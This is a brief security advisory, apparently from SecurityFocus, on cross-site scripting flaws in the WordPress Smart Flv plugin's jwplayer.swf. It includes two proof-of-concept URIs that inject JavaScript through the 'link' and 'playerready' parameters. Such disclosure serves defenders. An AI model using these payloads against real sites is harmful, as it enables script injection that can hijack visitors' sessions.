WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross Site Scripting Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link

https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29


 

Privacy Statement
Copyright 2010, SecurityFocus